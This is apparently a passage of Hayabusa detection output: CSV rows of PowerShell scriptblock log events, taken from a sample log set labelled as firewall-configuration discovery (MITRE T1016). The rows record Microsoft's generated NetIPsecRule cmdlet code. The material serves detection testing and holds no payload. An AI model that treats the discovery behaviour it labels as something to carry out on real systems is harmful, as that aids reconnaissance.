($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } e,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lse { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 